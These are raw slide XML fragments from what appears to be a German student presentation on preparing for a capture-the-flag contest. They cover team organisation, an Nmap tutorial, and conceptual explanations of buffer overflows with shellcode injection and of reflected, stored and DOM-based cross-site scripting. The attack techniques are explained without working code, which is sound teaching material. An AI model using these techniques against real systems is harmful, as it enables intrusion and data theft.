              <a:t> wird mit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> a[10] initialisiert und 15 Zeichen werden eingegeben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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Overflow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547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Führt meist zu einem Programmabsturz, da Speicherstellen, auf die kein Zugriff besteht, überschrieben werden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Kann jedoch von Hackern ausgenutzt werden, um Sicherheitsschranken zu umgehen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Dazu sind Assembler Kenntnisse nötig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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Overflow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05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Fortgeschritten ist das Überschreiben einer Rücksprungadresse, um in jeden Teil des Programms zu springen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Dabei muss bekannt sein, wo im Speicher diese Adresse steht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Der </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> muss soweit überfüllt werden, dass die Rücksprungadresse überschrieben werden kann.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Es ist sogar möglich mit dieser Methode eigenen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> zu injizieren und auszuführen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Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Overflow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578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dirty="0" err="1"/>
              <a:t>Buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Overflow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7" name="AutoShape 4" descr="https://upload.wikimedia.org/wikipedia/commons/thumb/f/f9/Nopsled.svg/200px-Nopsled.svg.png"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:extLst/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Eine </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Shellcodeinjection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> auf dem Stack sieht </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in etwa so aus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Das NOP ist ein Assembler Befehl, der nichts tut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Es wird genutzt damit die Sprungadresse in </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>jedem Fall erreicht wird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85" y="1748910"/>
            <a:ext cx="1905000" cy="47625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64450" y="658267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Maximilian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Wenzl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007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ICTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Marketing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Benign</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Server für Fileshare und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Etherpad</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Unterstützung beim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Coding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> und Anpassung des Service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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> Tutorial</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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826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Roxychains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&amp; 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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> 					Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Löckler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8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Plakate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>je 6 Plakate für die </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Infoverantstalltung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> und ICTF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Zusätzlich Text für die Monitore zusammengestellt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Infoveranstaltung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ca. 50 Interessenten an zwei Treffen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- Marketing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672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Service für den Veranstalter zum prüfen des </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Folkswagenservice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Vom Veranstalter gefordert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Verschleiert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Setflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> und </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Getflag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> aufrufe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ruft alle Funktionen des Service auf und prüft den Rückgabewert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Wirft einen Fehler, wenn der Service nicht ordnungsgemäß läuft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- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Benign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070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Windowslaptop aus dem Netzwerklabor mit Ubuntu als Virtuelle Maschine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Etherpad</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Tool zur synchronen Textbearbeitung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Verwendet um Informationen über zu Hackende Services schnell und effizient zu übermitteln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Fileshare</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Network File Server eingerichtet und Wiki zum verbinden erstellt</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Verwendet um größere Dateien, wie die Virtuelle Maschine oder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>decompilierte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> C-Files zu verteilen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– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>Etherpad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>- und Fileshareserver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241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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> kann verwendet werden, zum:</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Testen von verfügbaren Hosts in einem Netzwerk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Testen von offenen Ports eines Hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Herausfinden des Betriebssystems und der Version eines Hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Herausfinden der Art </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>von Paketfiltern/-Firewalls</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr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Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Tutorial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Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Löckler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4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pPr algn="l"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Hardware und Aufbau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Hardware ist vorhanden und wird verwendet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>1 Rechner mit dem vorbereiteten Debian Image</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>1 Alfa Wireless USB Adapter (insgesamt 2 vorhanden)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>1 Router mit dem frei verfügbaren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1" smtClean="0"/>
              <a:t>OpenWRT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> (beliebig konfigurier- und erweiterbar)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t>Ggf. einen weiteren Rechner als Client (abhängig von der Demo)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Umsetzung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1" y="4246318"/>
            <a:ext cx="3166278" cy="248573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153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Roxychains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&amp; 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Cross Site Scripting 		Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Zandtner</a:t>
            </a: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2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2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sicherheitslücke </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>in Webanwendungen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 smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Nicht </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>vertrauenswürdige Inhalte werden als vertrauenswürdig eingestuft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="360000">
              <a:buBlip>
                <a:blip r:embed="rId2"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Ziel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>: Erbeutung (sensibler) Daten des Nutzers</a:t>
            </a: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Arten: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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS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err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>XSS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Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zandtner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11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Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> XSS (non-persistent)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62</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Grafik 5" descr="Mal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1582767"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6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6992" y="1554010"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Grafik 7" descr="iconmonstr-server-4-icon-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0829" y="2804845"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8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2856215"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Grafik 9" descr="iconmonstr-server-4-icon-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0829" y="4290259"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Grafik 10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149" y="4333961"/>
            <a:ext cx="1012978" cy="621600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stCxn id="6" idx="3"/>
            <a:endCxn id="7" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3123322" y="1864810"/>
            <a:ext cx="2983670" cy="41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3"/>
            <a:endCxn id="8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3326837" y="3163132"/>
            <a:ext cx="2923992" cy="38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1"/>
            <a:endCxn id="11" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3325127" y="4644761"/>
            <a:ext cx="2925702" cy="37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fik 22" descr="Mal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7940" y="5734328"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="Grafik 23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5708151"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Gerade Verbindung mit Pfeil 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="24" idx="3"/>
            <a:endCxn id="23" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326837" y="6018951"/>
            <a:ext cx="2831103" cy="1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119737" y="1572298"/>
            <a:ext cx="276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Präparierte URL, z.B. mit Hilfe einer Email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3646584" y="2859709"/>
            <a:ext cx="205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Anfrage mit Schadcode in URL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3674016" y="4345123"/>
            <a:ext cx="220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Antwort mit Schadcode in HTML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6967403" y="2932299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Einbetten des Schadcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>in HTML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336296" y="5825669"/>
            <a:ext cx="1851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Ausführen des Schadcodes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3379044" y="5714700"/>
            <a:ext cx="255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Verlust (persönlicher, sensibler) Daten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464450" y="65826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Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zandtner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947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Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> XSS (persistent)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63</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6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3859" y="1582767"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8" descr="iconmonstr-server-4-icon-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0829" y="2804845"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Grafik 9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2856215"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Grafik 10" descr="iconmonstr-server-4-icon-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0829" y="4290259"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Grafik 11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149" y="4333961"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13" name="Gerade Verbindung mit Pfeil 12"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="7" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3123322" y="1868915"/>
            <a:ext cx="3127507" cy="616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3"/>
            <a:endCxn id="9" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3326837" y="3163132"/>
            <a:ext cx="2923992" cy="38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1"/>
            <a:endCxn id="12" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3325127" y="4644761"/>
            <a:ext cx="2925702" cy="37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940" y="5734328"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Grafik 16" descr="cli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3859" y="5708151"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Gerade Verbindung mit Pfeil 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3326837" y="6018951"/>
            <a:ext cx="2831103" cy="1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iconmonstr-server-4-icon-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0829" y="1516797"/>
            <a:ext cx="716574" cy="71657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076698" y="1406996"/>
            <a:ext cx="3220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Eintrag in Gästebuch oder Feedbackfunktion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>mit Schadcode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4027288" y="2852332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Anfrage an Server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6967403" y="2932299"/>
            <a:ext cx="181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Einbetten des Schadcodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" sz="1200" dirty="0" smtClean="0"/>
              <a:t>in HTML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3548792" y="4343121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Antwort mit Schadcode in HTML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336296" y="5825669"/>
            <a:ext cx="1851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Ausführen des Schadcodes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3374417" y="5708197"/>
            <a:ext cx="2827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Verlust ((persönlicher, sensibler) Daten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464450" y="65826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Stefan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="800" dirty="0" err="1" smtClean="0"/>
              <a:t>Zandtner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53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XSS – Cross Site Scripting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Local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" smtClean="0"/>
              <a:t> XSS (Dom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64</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Grafik 17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3859" y="1582767"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Grafik 18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6992" y="1554010"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Grafik 19" descr="iconmonstr-server-4-icon-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0829" y="2804845"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Grafik 20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2856215"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Grafik 21" descr="iconmonstr-server-4-icon-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0829" y="4290259"/>
            <a:ext cx="716574" cy="716574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Grafik 22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2149" y="4333961"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Gerade Verbindung mit Pfeil 23"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="3"/>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3123322" y="1864810"/>
            <a:ext cx="2983670" cy="41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0" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3326837" y="3163132"/>
            <a:ext cx="2923992" cy="388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2" idx="1"/>
            <a:endCxn id="23" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3325127" y="4644761"/>
            <a:ext cx="2925702" cy="37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Mal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7940" y="5734328"/>
            <a:ext cx="809463" cy="572295"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Grafik 27" descr="cli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859" y="5708151"/>
            <a:ext cx="1012978" cy="621600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
